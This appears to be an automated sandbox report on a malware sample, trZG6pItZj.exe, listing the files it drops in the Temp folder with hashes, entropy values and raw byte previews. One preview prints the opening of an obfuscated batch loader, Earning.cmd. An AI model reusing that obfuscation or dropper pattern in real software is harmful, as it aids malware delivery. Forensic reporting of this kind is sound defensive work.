                                                                                                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Brochure

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):95232
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998013871096484
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:sqxpOVTjMxZlPtl92iCycbXvruGQCeja6M0fSoXiZyeEP/TGN9bzZ5133He2qBxo:tPKv6lNX0vruGfwfSoSEeEP/yN5VTfc6
                                                                                                                                                                                                                                                                                                  MD5:6C1AEE29BD7F5710593402D1C6FC2142
                                                                                                                                                                                                                                                                                                  SHA1:1CC5943734CC2FC1D7BBC488E97F821239A3E3B9
                                                                                                                                                                                                                                                                                                  SHA-256:B869F6B200ABFF5542721F7CCDC87BB01CDBC31102956DCAA7E46C552D5B982E
                                                                                                                                                                                                                                                                                                  SHA-512:2561BEC7C1391347D7BDE38C344A98ECD64764733F6B39EC702A96AD9CD9B140795DFEBAB9B944DB7CCDF08B6DC63C58665F6263E7D546E8AE336F36EE43A46A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:......b..7...0..d..["....w)..p...t.5. `.\v.Y*..k.6....gk84m..x:r:.0...>s|.<...i......+v..<-.3...@;.O..+.g..?...@.ab........T@..JNEb.z...........Y.ll..a*.WVr..aK%$..pSO....t..a2t...p.n.w..'.,QR*Rq.............#.....|..Gj.'^..J...1......%.1e-l..w...SD....!.l'.d.$...W..d.D[...1..A.x$..5...T.<.s.... ^....4..[....>.....b.v.1F.)...m.!Tc|...._.......k............^....P.#.....W..!I.(.c......O.A.gR.WU.....w..0.u.xbJ.... .M.tB...c.....4+..l.).......}...P1......2..I.o.v.$.~S.C].....1|...x*..05..A!...t,g.[..<..+.....> .......".....w.*.e. !o....7`.....r[4Y3X.8..6YK.......rdMp.......m...P......t.D#f).Fq.....I.Evl......W....Z.h.2;`[s.n".l%...3.r.....f,......!~..........p.8.Q...I|)..4Lj..a...;..W.._RB.[q.Ip.F.............a=.\M.........<...,96....%..3:J...y.P.."..0....8.j{.'...V.......I..A.c...TH..-.1h..o....5'.GJ.R.(........&.)+.....%[.y..j^....#..nBp...dX..o....c.o.,3GtL`..`....o..a:......;..U'...agk&.$_%P..Q.lVEL!).V.k0}..j.39.=0....

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Buyers

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):54272
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.677771683499516
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:JWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY46z:JWf05mjccBiqXvpgFz
                                                                                                                                                                                                                                                                                                  MD5:03A413E3C0F468A8DAFF75C079A6E00E
                                                                                                                                                                                                                                                                                                  SHA1:9FF241CE3B86AA1AAC24F308C92C723B267A3A7F
                                                                                                                                                                                                                                                                                                  SHA-256:28EF2EF007A8F2FA7648EDD51C6FBBEEB98725F5D6450900A4735AD228A3903F
                                                                                                                                                                                                                                                                                                  SHA-512:0486E660AFE95510B4398A7D099EB20BAC1487925E8042ACB7495FFDB760B635C49F8AF781F3E0DD2531198AF35260D14B00F109A41CE21AA92F5B186F12C47D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...........................................................U.......S.].VW...M.3.B.U..q..E..........f;...4......f;...(........f;..........f;..............................A..$.a.A.3._^[..f..p.......N..."..t.j ..+.[.....B...u..]................3..E...u..U..M.jw..A...AX.M.f9...=......I...A...E...E...E...E...E...E...E...E.x.E.j.E.F.E.R.E...E...E.C.E...E...E.O.E...E...E.6.E...A...E...E.>.E.8.E...E...E.F.E.W.E...E...E................................................................................................... ....................................................U..QSVW3.....tf9U.ta..t....t..S....E.=ERCP..2....A...t+.}..w1.u..$...A...A..u...3._^[..u.....K...j..^....A...j..R...j..K.......E...A...A.+.E.4.E.v.E...E...E...E...E...E...A...E...E...E...E...E.&.E.!.E.O.E.\.E...E...E.*.E.<.E.V.E.U..S.].VW.}...j.h....WS.u2...M....N......u._^[]...9X u.9x$t.@...U.....E.VW.}...P....I..........E..m..@....]..E..]..s....m..]..!....}....]......E....G....._3.^....d.,......`5M.;........

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Disable

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):104448
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.730957014085472
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:CSfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPZ:CTq8QLeAg0Fuz08XvBNbjaAtsPZ
                                                                                                                                                                                                                                                                                                  MD5:130CD154679F29A6F3CAD6E427478683
                                                                                                                                                                                                                                                                                                  SHA1:6F5696ED43C2220B49405C4FD58ABEC781E14508
                                                                                                                                                                                                                                                                                                  SHA-256:9384137A3D8CC870B9D283225A60759FECE3D27CF3162E36F506480BCE06E51D
                                                                                                                                                                                                                                                                                                  SHA-512:BA3780D03DE2EAB88D16D319167F7A9A74EB1BFA1BA4E9181E582C0B9C715A8C5E3183F709E79326839A9D5650CA72D849B0F0ED1F213C504F75D350513E5F7A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:..(...........................f...$...8...R..............................$.............................8...L...\...n..............................4...........................t...s...........................................o.......9...........................,...>...V...l...........................................F...T...l.............B.....Y.B...@...@.".@.D.@.3.@.v.@...@.V.@...@...@...@...........B.Q.B.6.B..B.#qC...C.`.D.................=(C...D...B.....................A.u.t.o.I.t......VF...A...A.vGF..A.w.F.c.l.o.s.e. .a.l.l....'D.#'D.+'D.}.G...A...A.........W.M._.G.E.T.C.O.N.T.R.O.L.N.A.M.E...#.p.r.a.g.m.a. .c.o.m.p.i.l.e...#.n.o.t.r.a.y.i.c.o.n...#.r.e.q.u.i.r.e.a.d.m.i.n...#.O.n.A.u.t.o.I.t.S.t.a.r.t.R.e.g.i.s.t.e.r.....#.i.n.c.l.u.d.e.-.o.n.c.e...#.i.n.c.l.u.d.e.....e.d.i.t.....A.u.t.o.I.t. .v.3...T.a.s.k.b.a.r.C.r.e.a.t.e.d.....A.u.t.o.I.t. .v.3. .G.U.I...#.c.s...#.c.o.m.m.e.n.t.s.-.s.t.a.r.t...#.c.e...#.c.o.m.m.e.n.t.s.-.e.n.d.../.A.u.t.o.I.t.3.E.x.e.c.u.t.e.S.c.r.i.p.t.../.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Divine

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.99759569761765
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:OkX5PKc1atTQk4hffe99dtn9QlLTB1rIFcAsR371d9pBOQHifictIsB/Aa+t:OkJKBtTQk4Jfe99dtn9KLTLr/R371Okz
                                                                                                                                                                                                                                                                                                  MD5:FF2CE214D200D352C7D04800B152BC2E
                                                                                                                                                                                                                                                                                                  SHA1:988EF81E6A0F7571B52686341931162430BA6261
                                                                                                                                                                                                                                                                                                  SHA-256:311655E9C9BF8035F60D9E762C3C95D264232BFD96855E793402A5B5F4D5A13A
                                                                                                                                                                                                                                                                                                  SHA-512:9CB2A6AB541EB7BC96B7E4B15DA21456EEEDA8D9C8AB01BD84C794D46C632F0D2AACA480516F8D0A527AFB253AE196E7B5B54338BBF07F5145B912A4A6C3DFCD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.V..Q..Z.0ho6......Tt....V.b.,vq..8....t..F&.g.x...l.....A~6.e..+.lG.R..y.Q...^..]t./_'.~..x.4.s..!...i.k.+.*..Q.]p...m...y7.-..].c.}W- l.JD)..z...gnO.t4KX..5..".+.R*Y......X.......}Y.n...\...X[.?f[..u.e....m.jag%..-l..s>......UT.n.z'.h....1..!#?Z./.&..>.l..2....?..S)....ju....&T.D.o.*:.a.....o./.../.h.2..g.......V../?.,..~.j|..l.I...)..S....k.#X.%...]h...<..L..oE.^.}!.N.W.R...:......K..h..yV.....%...XA.h..y...B.V...l/.$Q.'.....vV.ha9..<^.7...T..Y(...,.gz.{.\g..M.....r...w..!.8...HQ+[..%...B9...0f.CB.2j."....~..O. .a.T..g....d..Z.m\.PGL..tt..8.>.~.-[.x.....~....EH.]..k.xD.i......D1d.}....9!.%...U...g.R~...Q.cG.....k.m........!.[..y...{d...?...J...R..M..hN.TxW?.?.S}.R. u.....p..R..P^)+lQ.X...L.a=...[C.3.R.|>]E ..?..s..6.....9G..sWdl....U.1bb.....#...;...zv.ir...oU`Ql...U75...b..U.....<+...H....[.rM..Z..l...a.vP....f.o.=...z8.I~?Y.....t\..S.y.J.M2`...sx..ezR._./.e...v.....*..~h.5.. aAG. .....s.......pZ6L......J........|..:%.;)S.L..{@

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Eagle

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):125952
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.720932430021314
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:XxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pZ:/HS3zcNPj0nEo3tb2j6AZ
                                                                                                                                                                                                                                                                                                  MD5:208ACEF2DFC4E230B25B4B4A0673FFE1
                                                                                                                                                                                                                                                                                                  SHA1:8D09B32A1BE8EBE1F8695653AA50C1FED4AB20C5
                                                                                                                                                                                                                                                                                                  SHA-256:152D7CCB9A28B79D9C29077330ED61C34BAD168C4B0BACBE16907D90A2046A65
                                                                                                                                                                                                                                                                                                  SHA-512:0DC461B583727B831BBD51A5B1822FE160CAAE07A46313F17D2957056D623C8CA103B3A47278C42F0EDE5C148D3717E065F6BB3CCFEB5E151272DAB91E0FBAE1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:A..f..Xu.I..f...t.f..@u...t.B....u..D$..........|$..............u..Q..D$..................@.f..Gu.A..f..Hu.I....f...t.f..@u....t..E.B......u.D...\$$.}.f.x.H.E...~.......v....F....k....u..A.........B.......D$$......htzL...Y..j.j)......D$$......h..I...X..j.j*..$......[..h..M..L$0.s.....$....P.L$0........X[...}...$........c........$...........$.........$..........t,.D....@.f..Ht.f..Ou..L$,....P..$......Y..2..$.....g.....uN.........L$(..p....t...y......t...t..@.P..$.....Y....$.....#.....u.......a....}...$.....u..L$(P..$.....$........PWV.$.........$.........X*......7....D$.......u..L$,..b....$....P.L$0.$.....$..........$.........D$4.\$,.D$..D$0.D$..\$$.....K....M.;...4...P..b...)....6.|......j..v..(.......................$.IdE..........P.T$hj..3.|.3........N..Aa..j..e.3.............j..P...p.........j..3.>..........Q....y.........o.....j....d....3....Z.......`..j.V.w.......C....=..M....s....I....M.;.......P..a.....Q....D$..@......@..J...........G....$.udE..D$.....

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Earning

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (388), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):13838
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.136304923041809
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:qFuJ9+qaE/5fOUYbE4g8jJ5U26CJvO6fhsI:qFO9N1vSE4J17JvO6iI
                                                                                                                                                                                                                                                                                                  MD5:1B6ACA105B86401BF6A8206AB2ED2604
                                                                                                                                                                                                                                                                                                  SHA1:4EC6822B90EEAC4ED23B1B199B6C1AC235601ADA
                                                                                                                                                                                                                                                                                                  SHA-256:1C68DA14F6314DB369B3A2A9E1BC2023F2E16F34B21D1F4C239511495473B183
                                                                                                                                                                                                                                                                                                  SHA-512:A163AD3005A74ADA8480F4CE6AEEE1692A487FFC4266530AB2F14F7F5B3B1CDAD0E26F2FEE895B0F16C0A9B42C08F2608AF3D8AD41E84A914B9E7AAB48177B07
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Set Rose=H..wAlxFaces-Joke-Experiencing-Supply-S-..qOwSample-Lopez-..DcVpn-Fx-Hunt-Reg-..enBrands-Younger-Benefits-Statistical-..dDWrite-Duty-Pet-Entity-Barbados-Chile-Committed-Dodge-..RoPressure-..Set Instrumentation=w..RrQCNick-Vampire-Longer-..ynaOpponents-..rfxEden-Feat-..gmAu-Dishes-Slots-..lNCarriers-Safety-Stations-Utc-Parish-Kids-Babes-..JtPassed-Bolivia-Borough-Furniture-Been-..upIGlucose-Faster-Once-Seasonal-Failures-..lsGathered-Designed-..PkkPl-Host-Shemale-Expense-Yards-Nervous-Dimensional-..Set Walker=y..zUuBMusical-Cest-..CeVkAngry-Unless-Greatly-Dont-Hepatitis-..ovFKnee-Mode-Austria-Messenger-Discover-Expanded-Took-Contracting-Oil-..xtChinese-Coalition-Builder-Resources-Shoppers-Seeks-Heavy-Optical-..NyPhilips-Tools-Beds-Applied-..QBAbuse-Panama-Violations-Appreciation-Alexander-Techrepublic-Phones-..SfiVolleyball-..jyRap-Flights-Pakistan-..gkWarcraft-Child-Nickname-Heating-Slot-Chief-Llc-Dj-..dOAkRealize-..Set Unexpected=C..zmVfFantasy-..HNLPrivate-..LpIFBed-Novels-El

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Earning.cmd (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (388), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):13838
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.136304923041809
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:qFuJ9+qaE/5fOUYbE4g8jJ5U26CJvO6fhsI:qFO9N1vSE4J17JvO6iI
                                                                                                                                                                                                                                                                                                  MD5:1B6ACA105B86401BF6A8206AB2ED2604
                                                                                                                                                                                                                                                                                                  SHA1:4EC6822B90EEAC4ED23B1B199B6C1AC235601ADA
                                                                                                                                                                                                                                                                                                  SHA-256:1C68DA14F6314DB369B3A2A9E1BC2023F2E16F34B21D1F4C239511495473B183
                                                                                                                                                                                                                                                                                                  SHA-512:A163AD3005A74ADA8480F4CE6AEEE1692A487FFC4266530AB2F14F7F5B3B1CDAD0E26F2FEE895B0F16C0A9B42C08F2608AF3D8AD41E84A914B9E7AAB48177B07
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Set Rose=H..wAlxFaces-Joke-Experiencing-Supply-S-..qOwSample-Lopez-..DcVpn-Fx-Hunt-Reg-..enBrands-Younger-Benefits-Statistical-..dDWrite-Duty-Pet-Entity-Barbados-Chile-Committed-Dodge-..RoPressure-..Set Instrumentation=w..RrQCNick-Vampire-Longer-..ynaOpponents-..rfxEden-Feat-..gmAu-Dishes-Slots-..lNCarriers-Safety-Stations-Utc-Parish-Kids-Babes-..JtPassed-Bolivia-Borough-Furniture-Been-..upIGlucose-Faster-Once-Seasonal-Failures-..lsGathered-Designed-..PkkPl-Host-Shemale-Expense-Yards-Nervous-Dimensional-..Set Walker=y..zUuBMusical-Cest-..CeVkAngry-Unless-Greatly-Dont-Hepatitis-..ovFKnee-Mode-Austria-Messenger-Discover-Expanded-Took-Contracting-Oil-..xtChinese-Coalition-Builder-Resources-Shoppers-Seeks-Heavy-Optical-..NyPhilips-Tools-Beds-Applied-..QBAbuse-Panama-Violations-Appreciation-Alexander-Techrepublic-Phones-..SfiVolleyball-..jyRap-Flights-Pakistan-..gkWarcraft-Child-Nickname-Heating-Slot-Chief-Llc-Dj-..dOAkRealize-..Set Unexpected=C..zmVfFantasy-..HNLPrivate-..LpIFBed-Novels-El

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Eva

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):72470
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.090938284600055
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:iWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:iWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                                                  MD5:BA176DB7E9DE7450C412A1C571937169
                                                                                                                                                                                                                                                                                                  SHA1:01718D40F54E5340E876E0C8CD15BC4B9C3CFF11
                                                                                                                                                                                                                                                                                                  SHA-256:1929AF35C1CCA40411BBF3C6BC4FF1416FA4971D2EAB01E4B3CA9D82BC78FD50
                                                                                                                                                                                                                                                                                                  SHA-512:D572131B71C8F652ABFC0F2DC9ADEC3045F21C3D14466579A9B9C9EEACBD1B492BF64225F34BE336799519FDA43650D004D3ABEC29F861E460472FB0815FFD3B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:r...../.......W'........,..<.t..P.};..7.b.'A...3.3...?.................K....y^.6.....WK.......!..`.`.....A...3..oU....8.0.P.....["..op!....3..2.B~.R..2....L.c!.....H'...F..L....q......r....?."...m$bR.r...."/....d.r......,.......h/{.....F..(0...&"_.....'.|>...V.....F2.b.br..k.fx..,kEo.T3 ..qh(.#{.........T......y>..ml[.XXX..|......(.T.?.[.{.gy...SK.X^...`.B&...`.c.3t&..x......J..?S.Te.....J.R..U..."?D...+6....uf..7.)U<.of.L.}.).9.G.:.H-..~.....D"Q.6....M....:.a....e...[.|.......w............at0E.5.(...<.......b.G.]q.+..i...H.XX..s...2.Ba.K.m!.*cs...d6....{I......f.."...-..d....).c......L/....qib.!.v<<..n...=....!.Sa...-(.....8.H..,....6..ID.....X+.9ue...N21..Y.6Bw{....<.............a..X.1.q..ovv......`...u.r.&_z.g...S.+|..-....,..B.WD..Gggg.-E.'O...._U...r.).5....v.o.1Nn..Y.6Ea..w.N...v...e,...C..s~....'..$......~...E....le|..7.q....W....~.}..<}.....*D...YU.?...X.{..|>n..O...i......7y...g....R......|...rn{.m".a.d>..75...u~..Y..........U..\....xx.....

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Flying

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):109568
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.612046274568224
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:kpIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jW:vphfhnvO5bLezWWt/Dd314V14ZgP0f
                                                                                                                                                                                                                                                                                                  MD5:EBAFAFE47265312CC96968BB58945199
                                                                                                                                                                                                                                                                                                  SHA1:4628BB988C420CCEAC163E069A082987A2A508E4
                                                                                                                                                                                                                                                                                                  SHA-256:9C0CE1E70AF52572D22685F85E9F2D75EB9D4C1CE8E82EA71C4A644B9E0927BA
                                                                                                                                                                                                                                                                                                  SHA-512:48827473E4259133AE2E759287770592B08B30349CB855FE67620E170EFDD9566FFAE1FB96EC6C2B1BB1C7FA9257566661C7E208A81CCE4DAF9B78E3D44F96A6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:..I8.y..|2...D2.t..@8.u......@......6..._..3..F.....^[..]...U...........#M.S.]..D$.V.D$......C..D$......D$.....W.0..{...m...F.j?.0..$<...P...3....f..$.....C..p.....l...F.h.....0..$8...P.V...3....f..$.....C..H..p...i.......$0......v..C..H..S.....$........$......D$.Pj.....I._^3.[..]...U..E.....@.SV..0..W.x..@l...v........PV.E..P.......u..u.........F.........U...j.j.j.....I..M....u..E[..j...j.W.a........uP..$.I....I..|....T..t..R8.B..|....D..t..@8.@..j.3.CSj.W............w....^..{...j..E.PV....I....u7..$.I....I..|....T..t..R8.B..|....D..t..@8V.@....(.I..j.3.CSj.W.................SSj.W.^........................E..^..]....C..0....j...v.j.j.j.W...........7W...C..p.....j...v.j.j.j.W...........W.._^3.[....U..E.SV.u..@.W.....x..t8...n....F.....3.....H..D9.8\9.t..@8.@......D9.8\9.......3.Sj.j.P.E..+........u........3.A.N........=...t*.......3..A.N....H..D9.8\9.t..@8.@......j.j.j..u..............P..(.I..M........E.3.A.H...t/....$.I....Q..L:.8\:.t..I8.A..D:.8\:.t..@8.X.....

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Handjobs

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):56320
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.484381852148502
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:mkBvRmLORuCYm9PrpmESvn+pqFqaynB6G/:mkBJR8CThpmESv+AqVnBV
                                                                                                                                                                                                                                                                                                  MD5:04915E6EFC00606817E44B785E0FC040
                                                                                                                                                                                                                                                                                                  SHA1:972C805FD5532BD87F0F754F39026FE975F82596
                                                                                                                                                                                                                                                                                                  SHA-256:176CDBDB7708CE1F761AF3EB1F33B66627B52D6C48BE213C6596DBCE68731F3A
                                                                                                                                                                                                                                                                                                  SHA-512:411DF77612FE79C83BFC826F7A922DDE6CADC316A8084E4E63FCD4C191F165526F8F1F7BA973849CD8637A7224DAFCF81C613519B5CE24B0D44695C3A3B300D4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:... ....}........G.P.mo...G.......;.t.P.ky...G(.............G,.......w0.....G4..4..........G8;.t.P./y..........GH..D....GL..H....GP..P...t..GT........Q..........._^]...U...8VWjX...M...Y...".................Q.O....n.........O.;.t.P.x.........O8.G(.......G,.........G0.......G4..4...;.t.P.nx....D....M.GH..H....GL..P....GP.......GT.I...P...N..@........M......M......._^..U..VW..j..w..}...Y.u...........u......G..A..G..H..O..G._^]...U..VW.}.....Q..A...t..B...t..P.;.u...;N.u..V.Q.....'..N._^]...U..m..u..}..t..u.j.hg....u...H.I.3.]...U.......`...SW.E.P......Ph.....u...d.I...............P......hP~L.P..........P.........f..]....\u.f..]....:t.3.f..]....3.W.u...$.I...u.8E.t(Wh.. .j.WWh...@.u.....I......u..u...(.I.3._[....h..........j.P.|...............f.........f............h....P......P...........M....3...f.........RQRR...P......Ph....W..L.I.W..u...`.I..`.....`.I.3.@.]...U......<SVW.}..G..0....E...N....D$..D$8.A..D$<.A..D$@.A..D$D...G..p....E...N....D$..A..D$..A..D$ .A..L$..D

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Imagination

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):99328
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.610810182218458
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:qi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSW:F0Imbi80PtCZEMnVIPPBxT/sZydTmp
                                                                                                                                                                                                                                                                                                  MD5:F87E02324242F1CA95FEDBA37CAA7F29
                                                                                                                                                                                                                                                                                                  SHA1:0490816C97722E9D4DA97985E67A7BE8E2E4EB7A
                                                                                                                                                                                                                                                                                                  SHA-256:6D089A79D61945744FDD931C131068B2E2ACCA8721DF0D26D9D797957D88B0E0
                                                                                                                                                                                                                                                                                                  SHA-512:DFF322F1D33AEFEFAF00E1EB26D90B90A031820B97E5C6D90FE90259542AC2B75FF6A3E09F585B855DD2AE012760E3963AEF35294B254E2560225CDB6617E06C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:_..^[].+.......U..]......t.I.....#M.....%.#M......U..Q...L.3.E.W.}.;}.u....WV..S....t.......I....t....;u.u.;u.u....,;.t&....~..t.....t.j.......I...Y....F.;.u.2.[^.M.3._..8....]..U..Q...L.3.E.V.u.9u.t#...W.>..t.j.......I...Y....F.;E.u._.M...3.^.7....].j.h.L..N7...e...E..0.q\..Y.e...5..L.....35.#M...u..E.............X7......u.M..1.{\..Y..U.....E..M..E..E.E.P.u..E.P......]..U..E.H...t-...t....t....t....t.3.]..#M.]..#M.]..#M.]..#M.]..U..k.x'J...E...;.t..U.9P.t....;.u.3.]..U..Q.E.Pj..]...YY..]..U...u...#M..}z...u...#M..pz...u...#M..cz...u...#M..Vz..]..^Y......j,h.L...H..3.].!]...M.u.j._;...t5.F....t"H...t'H...uL.....t....t....~;....6V.........E..Y....]..u.........3V.....YY3.......u..2..........:S......2.M.E.e....t.j..Z..Y.M.e...E...e...E..t.....L.....3...M.......E.3......U.U..........u...t.j..Z..Yj...x..;.t....t....u#.C..E.c..;.u;........E...........;.u"k.|'J....k..'J....E.;.t%.`.........L....j Y+.3...3...L..M...E......1....}..uk;.u6.W.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Lp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):70656
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.697542216564925
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:UqvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4CY:Uqv+32eOyKODOSpQSAU4CY
                                                                                                                                                                                                                                                                                                  MD5:D1DA746C6F362A9F5F7F1C85881D10DB
                                                                                                                                                                                                                                                                                                  SHA1:BBC4E7309BB49662A7A6DB1F783821B98C68C259
                                                                                                                                                                                                                                                                                                  SHA-256:0DDD6AB68693CDEA2F6B39FBB12328E3D41CC39DC4B9F40B7810149872CAEF20
                                                                                                                                                                                                                                                                                                  SHA-512:0331C3E4F496E125EF6B0A2A84547DC172302FF75E137E83DC10CE9161AFE3A64883BC6665560CC40620D07F18CE163B2BCFC68B3E3176AF99F1804ACF88F2DA
                                                                                                                                                                                                                                                                                                  Malicious:false
